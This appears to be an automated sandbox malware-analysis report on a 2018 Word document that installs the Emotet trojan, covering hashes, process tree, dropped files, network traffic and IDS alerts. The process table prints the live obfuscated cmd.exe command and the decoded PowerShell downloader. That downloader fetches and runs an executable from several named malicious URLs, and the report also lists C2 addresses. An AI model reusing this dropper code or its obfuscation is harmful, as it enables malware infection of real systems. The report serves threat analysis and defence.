download: | HoHv-qnp1ONYYbwDd3w_FmAKTRaW-WlM |
Full analysis: | https://app.any.run/tasks/e0db8b12-f1a3-41ac-9b8d-f216487b92b9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 02:04:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 17:18:00 2018, Last Saved Time/Date: Thu Dec 13 17:18:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0 |
MD5: | D6DBAAD60350AEA54AF8A7A9EAA71679 |
SHA1: | 836B7BDDCA3BCA2606C84420FFF82504F53748B7 |
SHA256: | 24A7D15919219A25F02CD661B3B4FC7438B27499E78ECC10B63DC5685B524938 |
SSDEEP: | 1536:mqocn1kp59gxBK85fBnpx/7F+ze7UCQcYOA+a9:w41k/W487xFTYcYO |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:13 17:18:00 |
ModifyDate: | 2018:12:13 17:18:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 22 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 24 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2828 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\HoHv-qnp1ONYYbwDd3w_FmAKTRaW-WlM.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3960 | c:\RsqPulGkozfJlI\AitkcCTV\YihOIAshi\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set CS5M=zYLOzXtEaAFqfvMXYzRmsb.@0'ndWighKwuVUr +,jT}y1S(;/NGQ)Ix=8l-\$5eJkBC{9o:pHcD&&for %Z in (61;72;12;42;56;25;72;41;8;25;48;61;36;11;13;56;26;63;33;59;70;21;41;63;74;6;38;50;63;6;22;28;63;21;67;58;29;63;26;6;48;61;41;42;64;56;25;31;6;6;72;71;49;49;27;63;20;29;30;26;74;58;70;34;27;29;26;74;22;74;70;19;49;10;58;58;32;41;7;8;23;31;6;6;72;71;49;49;29;30;58;70;70;74;33;65;22;74;70;19;22;21;37;49;64;42;63;62;3;23;31;6;6;72;71;49;49;58;63;20;8;19;29;20;27;63;19;70;58;63;26;27;70;20;8;65;70;19;21;29;22;74;27;49;31;2;23;31;6;6;72;71;49;49;19;63;6;6;22;74;70;19;22;34;8;49;66;21;23;31;6;6;72;71;49;49;33;33;33;22;44;70;58;74;34;29;26;20;8;8;6;65;63;20;8;26;22;74;70;19;49;52;67;42;11;25;22;46;72;58;29;6;47;25;23;25;53;48;61;66;18;28;56;25;35;11;26;25;48;61;27;46;73;38;56;38;25;69;45;24;25;48;61;35;34;52;56;25;52;73;7;25;48;61;72;52;18;56;61;63;26;13;71;6;63;19;72;39;25;60;25;39;61;27;46;73;39;25;22;63;55;63;25;48;12;70;37;63;8;74;31;47;61;33;8;11;38;29;26;38;61;41;42;64;53;68;6;37;44;68;61;36;11;13;22;75;70;33;26;58;70;8;27;10;29;58;63;47;61;33;8;11;40;38;61;72;52;18;53;48;61;75;29;16;56;25;41;12;28;25;48;54;12;38;47;47;51;63;6;59;54;6;63;19;38;61;72;52;18;53;22;58;63;26;30;6;31;38;59;30;63;38;57;24;24;24;24;53;38;68;54;26;13;70;65;63;59;54;6;63;19;38;61;72;52;18;48;61;74;31;72;56;25;32;73;33;25;48;21;37;63;8;65;48;43;43;74;8;6;74;31;68;43;43;61;50;2;41;56;25;51;14;33;25;48;77)do set JRh=!JRh!!CS5M:~%Z,1!&&if %Z gtr 76 powershell.exe "!JRh:~5!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2432 | CmD /V:O/C"set CS5M=zYLOzXtEaAFqfvMXYzRmsb.@0'ndWighKwuVUr +,jT}y1S(;/NGQ)Ix=8l-\$5eJkBC{9o:pHcD&&for %Z in (61;72;12;42;56;25;72;41;8;25;48;61;36;11;13;56;26;63;33;59;70;21;41;63;74;6;38;50;63;6;22;28;63;21;67;58;29;63;26;6;48;61;41;42;64;56;25;31;6;6;72;71;49;49;27;63;20;29;30;26;74;58;70;34;27;29;26;74;22;74;70;19;49;10;58;58;32;41;7;8;23;31;6;6;72;71;49;49;29;30;58;70;70;74;33;65;22;74;70;19;22;21;37;49;64;42;63;62;3;23;31;6;6;72;71;49;49;58;63;20;8;19;29;20;27;63;19;70;58;63;26;27;70;20;8;65;70;19;21;29;22;74;27;49;31;2;23;31;6;6;72;71;49;49;19;63;6;6;22;74;70;19;22;34;8;49;66;21;23;31;6;6;72;71;49;49;33;33;33;22;44;70;58;74;34;29;26;20;8;8;6;65;63;20;8;26;22;74;70;19;49;52;67;42;11;25;22;46;72;58;29;6;47;25;23;25;53;48;61;66;18;28;56;25;35;11;26;25;48;61;27;46;73;38;56;38;25;69;45;24;25;48;61;35;34;52;56;25;52;73;7;25;48;61;72;52;18;56;61;63;26;13;71;6;63;19;72;39;25;60;25;39;61;27;46;73;39;25;22;63;55;63;25;48;12;70;37;63;8;74;31;47;61;33;8;11;38;29;26;38;61;41;42;64;53;68;6;37;44;68;61;36;11;13;22;75;70;33;26;58;70;8;27;10;29;58;63;47;61;33;8;11;40;38;61;72;52;18;53;48;61;75;29;16;56;25;41;12;28;25;48;54;12;38;47;47;51;63;6;59;54;6;63;19;38;61;72;52;18;53;22;58;63;26;30;6;31;38;59;30;63;38;57;24;24;24;24;53;38;68;54;26;13;70;65;63;59;54;6;63;19;38;61;72;52;18;48;61;74;31;72;56;25;32;73;33;25;48;21;37;63;8;65;48;43;43;74;8;6;74;31;68;43;43;61;50;2;41;56;25;51;14;33;25;48;77)do set JRh=!JRh!!CS5M:~%Z,1!&&if %Z gtr 76 powershell.exe "!JRh:~5!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2292 | powershell.exe "$pfT='pja';$Uqv=new-object Net.WebClient;$jTJ='http://designcloudinc.com/FllKjEa@http://igloocwk.com.br/JTe5O@http://lesamisdemolendosakombi.cd/hL@http://mett.com.ua/Bb@http://www.yolcuinsaatkesan.com/QCTq'.Split('@');$BRW='Vqn';$dSH = '910';$VuQ='QHE';$pQR=$env:temp+'\'+$dSH+'.exe';foreach($waq in $jTJ){try{$Uqv.DownloadFile($waq, $pQR);$DiY='jfW';If ((Get-Item $pQR).length -ge 80000) {Invoke-Item $pQR;$chp='KHw';break;}}catch{}}$NLj='GMw';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3560 | "C:\Users\admin\AppData\Local\Temp\910.exe" | C:\Users\admin\AppData\Local\Temp\910.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
2588 | "C:\Users\admin\AppData\Local\Temp\910.exe" | C:\Users\admin\AppData\Local\Temp\910.exe | 910.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
2096 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 910.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
2780 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Version: 4.0.6304.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA5B9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E7A54CA.wmf | — | |
MD5:— | SHA256:— | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2783F768.wmf | — | |
MD5:— | SHA256:— | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NNMIODF599AND00U6LY1.temp | — | |
MD5:— | SHA256:— | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF2856AD.wmf | wmf | |
MD5:8EFD73A2D2896412A0458F04170E6820 | SHA256:4D0D4DF6F6DF070A040868C092024B39E1CD5C508F44A24005E996DB0E03BE03 | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C0E05B10780841AE15969333DA0BFE18 | SHA256:8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443 | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71B8CA43.wmf | wmf | |
MD5:756EAE4B93580218EEABC6880F8ABA88 | SHA256:77B604B824FAAEDFA70C7D09730C8D0DAA4C6915014437B912D06B58D23756E5 | |||
2588 | 910.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:96BC2576E9FB06D766F01887C7B15873 | SHA256:E3A7EA814AC11D52D0636CF94DD503DD9281973F63FE50E58B708CC44E37BA3B | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:E02BCF7486527C5DC1870BAFC753B34C | SHA256:2E1B2EF5563E6102CDF33EC6F992E823346937BE126DF65126AB717EAE5749FA | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2780 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
2292 | powershell.exe | GET | 301 | 154.16.144.102:80 | http://lesamisdemolendosakombi.cd/hL | US | html | 394 b | malicious |
2292 | powershell.exe | GET | 301 | 104.156.48.66:80 | http://designcloudinc.com/FllKjEa | US | html | 242 b | malicious |
2292 | powershell.exe | GET | 404 | 75.119.206.34:80 | http://igloocwk.com.br/JTe5O | US | html | 322 b | malicious |
2292 | powershell.exe | GET | 403 | 104.156.48.66:80 | http://designcloudinc.com/FllKjEa/ | US | html | 242 b | malicious |
2780 | archivesymbol.exe | GET | 200 | 186.136.68.246:80 | http://186.136.68.246/ | AR | binary | 132 b | malicious |
2292 | powershell.exe | GET | 200 | 154.16.144.102:80 | http://lesamisdemolendosakombi.cd/hL/ | US | executable | 120 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2292 | powershell.exe | 75.119.206.34:80 | igloocwk.com.br | New Dream Network, LLC | US | malicious |
2292 | powershell.exe | 154.16.144.102:80 | lesamisdemolendosakombi.cd | — | US | malicious |
2292 | powershell.exe | 104.156.48.66:80 | designcloudinc.com | HIVELOCITY VENTURES CORP | US | malicious |
2780 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2780 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
designcloudinc.com |
| malicious |
igloocwk.com.br |
| malicious |
lesamisdemolendosakombi.cd |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2292 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2292 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2780 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2780 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2780 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |